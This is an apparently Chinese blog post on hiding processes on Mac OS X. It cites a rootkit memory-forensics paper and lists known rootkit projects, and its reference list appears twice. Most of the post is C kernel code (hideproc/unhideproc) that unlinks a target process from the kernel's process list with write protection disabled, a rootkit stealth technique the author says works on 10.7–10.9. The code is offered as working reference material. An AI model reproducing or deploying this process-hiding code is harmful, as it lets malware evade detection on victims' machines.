Mac OS X 隐藏进程相关资料
2014-05-13 14:04
1641 查看
http://forensic.n0fate.com/wp-content/uploads/2012/12/Hunting-Mac-OS-X-rootkit-with-Memory-Forensics.pdf
参考codes:
frasm-master.zip
inficere-master.zip
onyx-the-black-cat-master.zip
rubilyn-0.0.1.tar.gz
KernelResolver-master
等等 Google、github上的资源
关键代码:作参考吧 亲测支持10.7-10.9
参考codes:
frasm-master.zip
inficere-master.zip
onyx-the-black-cat-master.zip
rubilyn-0.0.1.tar.gz
KernelResolver-master
等等 Google、github上的资源
关键代码:作参考吧 亲测支持10.7-10.9
int hideproc(int pid) { if ( pid <= 0 ) { return -1; } if (init_kernel_info(&g_kernel_info_hide_proc) != KERN_SUCCESS) { return KERN_FAILURE; } // IOLog("\nHide Proc!!!\n"); if(string_handler()==0) { struct proc* p; if(pid!=0) { for (p = my_allproc->lh_first; p != 0; p = p->p_list.le_next) { if(pid == p->p_pid) { if(hidden_p_count < MAX_HIDDEN_PROCESS) { // 记录该进程 hidden_p[hidden_p_count]=p; hidden_p_count++; // 隐藏该进程 enable_kernel_write(); my_proc_list_lock(); LIST_REMOVE(p, p_list); my_proc_list_unlock(); disable_kernel_write(); return 1; } } } } } return 0; } /* put the proc back via deceptikom */ int unhideproc(int pid) { struct proc* p; int count; if(pid!=0){ if(hidden_p_count > 0) { for(count = 0;count < hidden_p_count;count++) // 1t { p = hidden_p[count]; enable_kernel_write_v2(); my_proc_list_lock(); LIST_INSERT_HEAD(my_allproc,p,p_list); my_proc_list_unlock(); disable_kernel_write_v2(); hidden_p_count--; } } } return 0; }
相关文章推荐
- Mac OS X进程隐藏后 关机卡住问题
- Mac OS X Mavericks, Yosemite & El Capitan 显示和隐藏隐藏文件
- 枚举进程,及其进程相关信息的资料整理
- 打开 Mac OS X 隐藏的用户资源库文件夹的方法
- Mac OS X操作系统下显示隐藏文件
- 在Mac OS X下使用终端显示隐藏文件
- 如何在Mac OS X上创建一个Service服务进程
- Mac OS X安装JDK1.6及相关备忘 解决了找不到tools.jar的问题
- [Mac OS X Cocoa编程]如何获取其他应用程序的窗体标题以及相关信息?
- 【资料】Mac OS X 10.9虚拟机镜像及tools
- Mac OS X 系统怎样显示和隐藏文件
- Apple Mac OS X每日一技巧011:选中文件重命名/选中打开文件/关闭隐藏程序快捷键
- 苹果Mac OS X系统快速显示/恢复隐藏文件的方法介绍
- Mac os x 显示隐藏文件方法
- MacOS X自动切换是否显示所有隐藏文件和文件夹
- 显示Mac OS X Lion中隐藏的Library文件夹
- MAC OSX下查看某个端口被哪个程序占用及杀进程方法
- 如何在Mac OS X中开启或关闭显示隐藏文件命令
- [OE]服务器OS相关资料
- SELinux、SEAndroid、MAC、Andorid(AOSP) seplicy 相关资料